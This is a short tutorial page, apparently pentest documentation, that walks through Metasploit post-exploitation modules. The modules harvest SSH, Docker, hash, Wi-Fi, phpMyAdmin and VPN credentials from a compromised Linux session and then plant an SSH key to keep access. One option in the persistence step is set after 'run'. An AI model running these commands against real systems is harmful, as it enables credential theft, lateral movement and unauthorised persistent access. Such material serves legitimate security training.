Credential gathering and persistence

Once a system is compromised, gathering credentials is crucial for lateral movement and further exploitation.

use post/multi/gather/ssh_creds
set SESSION 1
run

This module extracts stored SSH credentials, which can be used to access other machines in the network.

use post/multi/gather/docker_creds
set SESSION 1
run

This command retrieves Docker authentication credentials, which may provide access to containerized applications and services.

use post/linux/gather/hashdump
set SESSION 1
set VERBOSE true
run

Hash dumping allows attackers to obtain user password hashes, which can be cracked offline using tools like Hashcat or John the Ripper.

use post/linux/gather/ecryptfs_creds
set SESSION 1
run

If the target system uses EcryptFS for encrypted directories, this module extracts the necessary keys.

use post/linux/gather/enum_psk
set SESSION 1
run

This module lists stored Wi-Fi passwords, which can be useful for network pivoting.

use post/linux/gather/enum_xchat
set SESSION 1
set XCHAT true
run

Attackers can use this module to extract credentials and chat logs from XChat, an IRC client.

use post/linux/gather/phpmyadmin_credsteal
set SESSION 1
run

Many administrators use phpMyAdmin to manage databases. This module extracts stored credentials, allowing access to sensitive data.

use post/linux/gather/pptpd_chap_secrets
set SESSION 1
run

This module collects credentials stored in the chap-secrets file, potentially giving an attacker access to VPN connections.

Maintaining access to a compromised system ensures an attacker can return even after a reboot or security patch.

use post/linux/manage/sshkey_persistence
set SESSION 1
run
set CREATESSHFOLDER true

This module installs an SSH key for persistent access, ensuring the attacker can log in even if passwords are changed.

Last updated 5 months ago